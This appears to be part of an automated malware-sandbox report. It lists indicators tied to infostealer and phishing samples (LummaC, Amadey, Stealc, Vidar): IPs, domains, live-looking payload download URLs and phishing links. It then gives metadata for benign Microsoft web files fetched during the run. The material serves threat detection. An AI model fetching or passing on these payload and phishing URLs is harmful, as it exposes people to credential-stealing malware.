                                                                                                                                                                      file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                      • 185.215.113.16/luma/random.exe
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 185.215.113.16/off/def.exe
                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                      • 185.215.113.16/mine/random.exe
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      cook-rain.sbsfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 172.67.155.248
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 172.67.155.248
                                                                                                                                                                      s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      https://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      17321442093b7efcab383e800ce7d48a843c02e132542886b8b8918e7e8cfcc51ec7dd418b419.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 94.245.104.56
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      Encrypt DOC2024.11.20.1983928 shared with you!.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 52.109.32.46
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                      • 94.245.104.56
                                                                                                                                                                      https://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 52.155.5.177
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 13.107.246.60
                                                                                                                                                                      https://binusianorg-my.sharepoint.com/personal/radja_hizbullah_binus_ac_id/_layouts/15/guestaccess.aspx?share=ETHY_S_rOwNFgVsgBzxZDRgB0fQxIDkLS5qX9M9nLivRaw&e=mq1rkfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 13.107.136.10
                                                                                                                                                                      Invoice PSI-3102.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 52.109.76.243
                                                                                                                                                                      CLOUDFLARENETUSibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 188.114.97.6
                                                                                                                                                                      ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 188.114.97.6
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 104.21.80.55
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 172.67.206.172
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 185.215.113.16
                                                                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 185.215.113.16
                                                                                                                                                                      file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                      • 185.215.113.206
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      https://www.virustotal.com/gui/domain/ghabovethec.info/detection#:~:text=API-,ghabovethec.info,-RegistrarGet hashmaliciousAveMariaBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      https://msf-update.cloud/?rid=wDbmX0hGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      https://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      Document-v22-21-06.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 52.149.20.212
                                                                                                                                                                      • 184.28.90.27
                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      https://tally.so/widgets/embed.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      https://www.cbirc.gov.cn/cn/view/pages/index/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      BOA-everbridge.com-$29,890.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      plutonium.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                      • 40.113.110.67
                                                                                                                                                                      • 40.113.103.199
                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                      No context
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):19696
                                                                                                                                                                      Entropy (8bit):7.9898910353479335
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                      MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                      SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                      SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                      SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                      Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):33148
                                                                                                                                                                      Entropy (8bit):4.917595394577667
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                      MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                      SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                      SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                      SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                      Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):35005
                                                                                                                                                                      Entropy (8bit):7.980061050467981
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                      MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                      SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                      SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                      SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                      Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):13842
                                                                                                                                                                      Entropy (8bit):7.802399161550213
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                      MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                      SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                      SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                      SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4897
                                                                                                                                                                      Entropy (8bit):4.8007377074457604
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                      MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                      SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                      SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                      SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):47062
                                                                                                                                                                      Entropy (8bit):5.016115705165622
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                      MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                      SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                      SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                      SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                      Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):3130
                                                                                                                                                                      Entropy (8bit):4.790069981348324
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                      MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                      SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                      SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                      SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                      Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):18367
                                                                                                                                                                      Entropy (8bit):7.7772261735974215
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                      MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                      SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                      SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                      SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                      Malicious:false
